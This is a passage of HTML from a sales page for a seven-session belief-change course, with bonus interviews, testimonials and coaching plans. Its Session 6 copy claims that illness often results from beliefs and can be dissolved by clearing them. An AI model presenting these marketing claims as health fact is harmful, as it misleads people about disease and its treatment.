src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.\r\n\r\nIf you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.\r\n\r\nA lot of people say, “just change your beliefs...” as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.\r\n\r\nIn the <em>Clear Your Beliefs</em> course, you’ll get guidance from me, through a series of recorded classes. You also have the opportunity to work with a professional <em>Clear Your Beliefs Coach </em>in private sessions. Join me for seven sessions of deep healing and transformation. Clear your old beliefs, and create the life you want.\r\n\r\nThis is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.\r\n\r\nLive the life of your dreams. There’s nothing to stop you – except a few old beliefs... In gratitude, and with warm wishes for your total success,\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\r\n\r\nLion Goodman, Creator of <em>The BeliefCloset Process</em>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Register Today and Discover What''s Possible</h1>\r\nWe are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience. You’ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful technique used by hundreds of coaches and therapists around the world.\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 1: </span> <strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.In this first session, you’ll examine your old beliefs, and determine which ones no longer serve you. It’s time to discard them and clear some space!You’ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades. You’ll feel more open, empowered and free to choose your beliefs and the way you live your life.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 1, you will:</strong>\r\n<ul>\r\n	<li>Discover old limiting beliefs that are deeply buried in your subconscious mind</li>\r\n	<li>Learn which ones keep you stuck, preventing you from having what you want in life</li>\r\n	<li>Experience a process that returns you to your True Self, the home of inner joy and bliss</li>\r\n	<li>Begin to work with, not against, your subconscious mind – where your beliefs reside</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you’ll grow to love him, as I do.”</em>\r\n<div style="text-align: right;"><strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 2: </span> <strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you’ll focus on issues and problems that have kept you from being happy and joyful.What do you believe about yourself? Your idea of “Who I am” is based on beliefs and programming you got as a child. What messages did your parents, caregivers, and siblings plant in your child brain that still affect you?In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.It’s time to haul them out, and toss them out! You don’t need them anymore. If you hear critical inner voices berating you, don’t miss this session. Rid yourself of those pesky critical voices along with the diapers!\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 2, you will:</strong>\r\n<ul>\r\n	<li>Use the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself</li>\r\n	<li>Clear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again</li>\r\n	<li>See your own magnificence through a new clear lens of your own beauty and joy</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day.”</em>\r\n<div style="text-align: right;"><strong>~ Jamee Tenzer, Life Coaching for Working Women</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div style="text-align: right;"></div>\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 3: </span> <strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\r\n\r\nThis isn’t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.<em>What are you capable of? </em> If your answer is “Anything...” you don’t need this session. But most of us think too small...\r\n\r\n</div>\r\n<div class="module_body">Our <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised. We let our negative beliefs stop us.You may hear internal voices say, <em>“What’s the use? You’ll fail anyway. You don’t deserve happiness. Look at you!” </em>We were shamed into thinking that we were less than others. We learned to compare ourselves to others – and we always lose that contest. Clear out any apparent limitations you''ve taken on, and find your true power to create what you want. Do whatever you need to do in order to achieve your vision.</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Do you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you’ll eliminate those beliefs and relieve yourself of those symptoms. You’re already a master manifestor – you''re just manifesting your old programs!</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 3, you will:</strong>\r\n<ul>\r\n	<li>Identify old beliefs that stand between you and creating the life you want</li>\r\n	<li>Dissolve the old beliefs that get in your way over and over, or make you quit when you’re partway there.</li>\r\n	<li>Imagine what it means to live without self-imposed limitations, trusting that you can create anything you want</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“Thank you taking me back to the beginning to help me hit the “reset” button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. ”</em>\r\n<div style="text-align: right;"><strong>~ S.K., Life Coach, Ontario, Canada </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 4: </span> <strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you’ll delete beliefs that interfere with your personal relationships. If you’re married, are you happy and secure? Or are you anxious about the future? If you’re not in a relationship, what’s holding you back from finding your ideal mate?\r\n\r\nHumans are social creatures – we must relate to others to survive. At our core, we want a security and safety, but we also want passion and romance. You learned “what love is” from your parents – so it’s no wonder that you’re confused! Most of us repeat patterns we learned from our early childhood. We watched our parents interact, and Mom and Dad’s relationship became our model of what a relationship is supposed to look like. Love was contaminated by disdain, contempt, withdrawal, or abuse. We were programmed to repeat their patterns – without conscious choice. This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\r\n\r\n</div>\r\n&nbsp;\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 4, you will:</strong>\r\n<ul>\r\n	<li>Look deeply into the childhood patterns that enabled you to survive and thrive</li>\r\n	<li>See which of your beliefs now interfere with your intimate relationships</li>\r\n	<li>Discover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ’belief-outfits’ are perfect for me, and I’m wearing them with joy and enthusiasm!”</em>\r\n<div style="text-align: right;"><strong>~ D. T., Physical Therapist, Denver, CO </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 5: </span> <strong>Clear Your Old Beliefs About Money and Work</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you’ll focus on money, wealth and abundance – or the lack thereof!\r\n\r\nWhat do you believe about earning a living in today’s economy? Is money really the root of all evil?\r\n\r\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem. Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture. Can you see their influence?\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 5, you will:</strong>\r\n<ul>\r\n	<li>Examine your family and cultural beliefs about money, work, poverty and “deservingness.”</li>\r\n	<li>Remove beliefs that create stumbling blocks in the way of natural abundance</li>\r\n	<li>Create new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve</li>\r\n	<li>Learn why affirmations alone, and the “Law of Attraction,” don’t work, regardless of how diligently you practice them</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs.”</em>\r\n<div style="text-align: right;"><strong> ~ T. S., Business Owner, Yukon, Canada</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 6: </span> <strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you’ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.\r\n\r\nIll health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.What do you believe and perceive about your body? Your health? Your age? Your vitality? Your ability to heal? The future of your health?\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 6, you will:</strong>\r\n<ul>\r\n	<li>Identify old beliefs that stand between you and vibrant health</li>\r\n	<li>Recognize beliefs that make you vulnerable to disease and injury</li>\r\n	<li>Dissolve old beliefs at the root of illness, bad habits and lifestyle stress</li>\r\n	<li>Imagine the healthy, vibrant body you want, and create it consciously with new beliefs</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before.”</em>\r\n<div style="text-align: right;"><strong>~ T. L., Healer, Stamford, CT </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 7: </span> <strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you’ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\r\n\r\nYou’ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\r\n\r\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you’ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 7, you will:</strong>\r\n<ul>\r\n	<li>Scan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live</li>\r\n	<li>Learn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life</li>\r\n	<li>Find your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<!--[wpfcNOT]-->\r\n\r\n&nbsp;\r\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\r\nIn addition to these seven transformational sessions, you’ll also receive these awesome bonus interviews and gifts. These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #1: <strong>Love: What Makes It So Confusing?\r\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3.jpg"><img class="alignleft  wp-image-1053" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3-232x300.jpg" alt="Carista Portrait 3" width="161" height="209" /></a>We all want more love in our life, but something keeps getting in the way. We can’t seem to stop hurting each other. What’s going on?\r\n\r\nLion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.<em> </em>(She is also known as <em>Lion''s fiance''</em>)\r\n\r\nCarista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We’re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.\r\n\r\nLearn how to determine your own (and your partner’s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2). You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\r\n<strong>\r\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute. She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations. Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em> In partnership with Lion, she developed LLI’s leading-edge evolutionary leadership program. After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.\r\n\r\n</div>\r\n</div>\r\n<!-- b2 -->\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process.”</em>\r\n<div style="text-align: right;"><strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<!--[wpfcNOT]-->\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #2 <strong>- The LoveStyle Profile Quiz </strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships.  Developed by Carista Luminare and Lion Goodman, you’ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.\r\n\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth.”</em>\r\n<div style="text-align: right;"><strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #3: <strong> The Spiritual Technology of Manifesting\r\nGuest Faculty: Anodea Judith, Ph.D. </strong></span></div>\r\n<div class="module_body">\r\n\r\n<img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You’ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world’s leading experts on the Chakras. Her books have sold more than 500,000 copies worldwide.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nLion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world. You’ll receive the first two chapters of the book as Bonus #4, below.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nAnodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>. She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world. Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\r\n\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>"I uncovered beliefs I didn''t know I had, including: “<i>I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God.”</i> It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\r\n<div style="text-align: right;"><strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session"><span class="session">Bonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong></span></span></div>\r\n<div class="module_body">\r\n\r\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\r\n<ul style="padding-left: 20px;">\r\n	<li>Be called to awaken your already-powerful ability to create the life of your dreams</li>\r\n	<li>Learn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)</li>\r\n	<li>Understand the 7 chakras as stepping stones along the path of the manifestation process</li>\r\n	<li>Gain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life</li>\r\n	<li>Learn a process that can strengthen your power of intention</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“This valuable tool will enhance your life in ways you cannot imagine. It’s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding.”</em>\r\n<div style="text-align: right;"><strong><strong>~ C.T., Performance and Life Coach</strong></strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #5:<strong> Transform Your Beliefs eBook</strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/TYB-Cover.jpg"><img class=" wp-image-433 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/TYB-Cover.jpg" alt="TYB Cover" width="159" height="206" /></a>\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nYou’ll also receive a copy of Lion’s multimedia eBook, “<em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em>.” Lion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why we do what we do, and why it’s so difficult to change our habitual patterns of thought and behavior. It’s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them.”</em>\r\n<div style="text-align: right;"><strong><strong>– M.M., International Business Consultant</strong></strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #6: <strong>Complete Transcripts of the Course</strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\r\n\r\n</div>\r\n</div>\r\n&nbsp;\r\n<h1 id="bonus">Optional: Professional Coaching Sessions</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="195" height="165" /></a>You can easily take this journey on your own, one recorded session at a time.  You also have the option of adding personalized support from a <em>Clear Your Beliefs Coach</em> – a qualified professional who will accompany you on your journey and guide you, step-by-step, through the process.\r\n\r\nOur outstanding coaches are trained to help you deal with almost any issue, regardless of how long it''s been interfering with your life. Your coach will safely guide you down to the deepest levels of your psyche – which can be difficult to get to all by yourself – yet it''s where the most powerful changes occur.  He or she will meet with you by phone (or Skype) each week, on a day that fits your schedule, at a time that''s convenient for you.\r\n\r\n<em>Clear Your Beliefs Coaches</em> are located throughout the United States and Canada, and worldwide, from Europe to Australia, and South Africa to Scandinavia. Your coach will guide you through any difficult inner terrain you might encounter, and help you identify and delete difficult-to-locate core beliefs.\r\n\r\n<strong>[Note: Our coaches help you change your own beliefs and reduce or eliminate the impact they’ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</strong>\r\n\r\nTake advantage of this up-close-and-personal support during the program.  Support sessions are optional, and are provided at an additional cost.  <strong>Choose the plan that suits you best - from the recorded program-only, to full support each week.</strong>\r\n\r\n&nbsp;\r\n<div class="icon_box" style="width: 760px; margin: 17px 0 17px -70px;">\r\n<h1>Register Today And You’ll Receive:</h1>\r\n<strong>Seven 90-Minute Class Sessions</strong> – Learn one of the world’s most powerful belief-change technologies, from the comfort of your own home.  Each class session gives you the skill to easily change your beliefs – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. Listen online, or download high-quality MP3s and listen anytime.\r\n<h1>Plus: <em>The Entire BONUS Collection:</em></h1>\r\n<ul>\r\n	<li><strong><em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.</li>\r\n	<li><em>T<strong>he Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.</li>\r\n	<li>Your Childhood Bonding Pattern Assessment: <strong><em>The LoveStyle Profile Quiz</em></strong></li>\r\n	<li><strong><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)</li>\r\n	<li>Multimedia eBook: <strong><em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> by Lion Goodman (PDF)</li>\r\n	<li><strong>A complete set of PDF Transcripts</strong> of all seven classes plus two bonus calls.</li>\r\n</ul>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Satisfaction Guaranteed</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program and unused coaching hours.)\r\n\r\n&nbsp;\r\n<h1>About Lion Goodman</h1>\r\n<a 